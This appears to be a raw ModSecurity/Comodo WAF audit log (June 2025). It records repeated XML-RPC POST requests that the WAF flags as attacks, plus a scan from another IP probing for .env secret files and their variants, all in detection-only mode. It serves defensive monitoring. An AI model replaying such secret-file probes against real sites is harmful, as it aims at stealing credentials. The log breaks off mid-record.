aE7Weg2U8ofTdsKp_yhbEAAAAAU 128.199.112.101 60520 127.0.0.1 7081 --68f9873d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 505 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --68f9873d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --68f9873d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7Weg2U8ofTdsKp_yhbEAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997178133394 956038 (- - -) Stopwatch2: 1749997178133394 956038; combined=2503, p1=404, p2=1683, p3=47, p4=68, p5=186, sr=113, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68f9873d-Z-- --66152d21-A-- [15/Jun/2025:19:50:39.779291 +0530] aE7WtrQco3e4Gnif-OQhsgAAABg 128.199.112.101 54084 127.0.0.1 7081 --66152d21-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --66152d21-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --66152d21-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7WtrQco3e4Gnif-OQhsgAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997238794530 984823 (- - -) Stopwatch2: 1749997238794530 984823; combined=2384, p1=367, p2=1568, p3=48, p4=69, p5=210, sr=97, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --66152d21-Z-- --acb21f31-A-- [15/Jun/2025:19:51:39.833129 +0530] aE7W8mSH9UwlAmGyeI_PQgAAAAE 128.199.112.101 35938 127.0.0.1 7081 --acb21f31-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --acb21f31-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --acb21f31-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7W8mSH9UwlAmGyeI_PQgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997298916467 916739 (- - -) Stopwatch2: 1749997298916467 916739; combined=2504, p1=397, p2=1539, p3=66, p4=89, p5=254, sr=117, sw=159, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --acb21f31-Z-- --c529546f-A-- [15/Jun/2025:19:52:39.907467 +0530] aE7XLnrzia-Xuz8LZxRaTQAAAAg 128.199.112.101 40120 127.0.0.1 7081 --c529546f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --c529546f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --c529546f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7XLnrzia-Xuz8LZxRaTQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997358955796 951728 (- - -) Stopwatch2: 1749997358955796 951728; combined=2499, p1=424, p2=1651, p3=59, p4=67, p5=183, sr=108, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c529546f-Z-- --6ad3b734-A-- [15/Jun/2025:19:53:39.011670 +0530] aE7XajFH_cIWXKTtjcar2wAAABY 128.199.112.101 44526 127.0.0.1 7081 --6ad3b734-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --6ad3b734-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6ad3b734-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7XajFH_cIWXKTtjcar2wAAABY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997418057703 954023 (- - -) Stopwatch2: 1749997418057703 954023; combined=2377, p1=365, p2=1554, p3=48, p4=62, p5=208, sr=101, sw=140, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6ad3b734-Z-- --96c5bd0a-A-- [15/Jun/2025:19:54:39.093866 +0530] aE7Xpqb75c8gBFW927z_2wAAAAM 128.199.112.101 43864 127.0.0.1 7081 --96c5bd0a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --96c5bd0a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --96c5bd0a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7Xpqb75c8gBFW927z_2wAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997478041990 1051942 (- - -) Stopwatch2: 1749997478041990 1051942; combined=2078, p1=375, p2=1328, p3=43, p4=62, p5=170, sr=103, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96c5bd0a-Z-- --e772c66d-A-- [15/Jun/2025:19:55:00.342387 +0530] aE7XujAyUstaws9su_zchwAAAAY 185.177.72.144 47952 127.0.0.1 7081 --e772c66d-B-- GET /.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e772c66d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=vrvj4nqi7mg17oqmd1er9bn8lr; path=/ Set-Cookie: _sfs_id=59ddde3d7785bf70ec59d896dc91a0711749997499; expires=Sun, 15 Jun 2025 15:24:59 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --e772c66d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env"] [unique_id "aE7XujAyUstaws9su_zchwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997498547072 1795419 (- - -) Stopwatch2: 1749997498547072 1795419; combined=1783, p1=417, p2=1250, p3=0, p4=0, p5=115, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e772c66d-Z-- --79cf033c-A-- [15/Jun/2025:19:55:02.445648 +0530] aE7XvLQco3e4Gnif-OQiQAAAABg 185.177.72.144 47114 127.0.0.1 7081 --79cf033c-B-- GET /.env.bak HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --79cf033c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=39ac3gdhu7jf11k0ern1s48p0e; path=/ Set-Cookie: _sfs_id=c5846303d74c593f69e6e3cecc91d2841749997501; expires=Sun, 15 Jun 2025 15:25:01 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --79cf033c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.gulachi.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env.bak"] [unique_id "aE7XvLQco3e4Gnif-OQiQAAAABg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.gulachi.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.gulachi.com"] [uri "/.env.bak"] [unique_id "aE7XvLQco3e4Gnif-OQiQAAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997500548240 1897526 (- - -) Stopwatch2: 1749997500548240 1897526; combined=2249, p1=494, p2=1619, p3=0, p4=0, p5=136, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79cf033c-Z-- --68c82042-A-- [15/Jun/2025:19:55:04.333994 +0530] aE7Xvtg39TKi8vFFY7LdDgAAAAI 185.177.72.144 47168 127.0.0.1 7081 --68c82042-B-- GET /.env.example HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --68c82042-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=hhotvpi57njutl4v62r7fuotg9; path=/ Set-Cookie: _sfs_id=7ab6c70f1554a2e86f8384df7a9055fc1749997503; expires=Sun, 15 Jun 2025 15:25:03 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --68c82042-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env.example"] [unique_id "aE7Xvtg39TKi8vFFY7LdDgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997502559508 1774575 (- - -) Stopwatch2: 1749997502559508 1774575; combined=1916, p1=401, p2=1406, p3=0, p4=0, p5=109, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68c82042-Z-- --93cb7c57-A-- [15/Jun/2025:19:55:06.188275 +0530] aE7XwAG_OhOIIVz6TXRwAgAAAAA 185.177.72.144 47214 127.0.0.1 7081 --93cb7c57-B-- GET /.env.local HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --93cb7c57-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=is6ukcesvqkkmgp2cqr78466ra; path=/ Set-Cookie: _sfs_id=d7c833fe318690af892c535f7f5667b71749997505; expires=Sun, 15 Jun 2025 15:25:05 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --93cb7c57-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env.local"] [unique_id "aE7XwAG_OhOIIVz6TXRwAgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997504448667 1739682 (- - -) Stopwatch2: 1749997504448667 1739682; combined=2488, p1=526, p2=1867, p3=0, p4=0, p5=94, sr=135, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --93cb7c57-Z-- --35da261f-A-- [15/Jun/2025:19:55:08.215776 +0530] aE7XwtPxWtsMww_1H9vdagAAABc 185.177.72.144 47264 127.0.0.1 7081 --35da261f-B-- GET /.env.old HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --35da261f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=ad963h0qpd1n467rd75bp1be90; path=/ Set-Cookie: _sfs_id=2badd62fbf41f9f806cafae83a8403361749997507; expires=Sun, 15 Jun 2025 15:25:07 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --35da261f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.gulachi.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env.old"] [unique_id "aE7XwtPxWtsMww_1H9vdagAAABc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.gulachi.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.gulachi.com"] [uri "/.env.old"] [unique_id "aE7XwtPxWtsMww_1H9vdagAAABc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997506301807 1914042 (- - -) Stopwatch2: 1749997506301807 1914042; combined=1725, p1=356, p2=1251, p3=0, p4=0, p5=118, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --35da261f-Z-- --6c19a81d-A-- [15/Jun/2025:19:55:10.068182 +0530] aE7XxGSH9UwlAmGyeI_PrgAAAAE 185.177.72.144 47352 127.0.0.1 7081 --6c19a81d-B-- GET /.env.production HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6c19a81d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=hl718017tfs2akpmis5ep25qja; path=/ Set-Cookie: _sfs_id=0955b1ac11c9cc19769c4238ac3e8a5a1749997509; expires=Sun, 15 Jun 2025 15:25:09 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --6c19a81d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env.production"] [unique_id "aE7XxGSH9UwlAmGyeI_PrgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997508329423 1738869 (- - -) Stopwatch2: 1749997508329423 1738869; combined=1805, p1=373, p2=1289, p3=0, p4=0, p5=143, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6c19a81d-Z-- --0b041405-A-- [15/Jun/2025:19:55:15.459925 +0530] aE7XybQco3e4Gnif-OQiSQAAABg 185.177.72.144 35368 127.0.0.1 7081 --0b041405-B-- GET /app/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0b041405-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=i4ad0u8eedafrgbsj80umi2ubl; path=/ Set-Cookie: 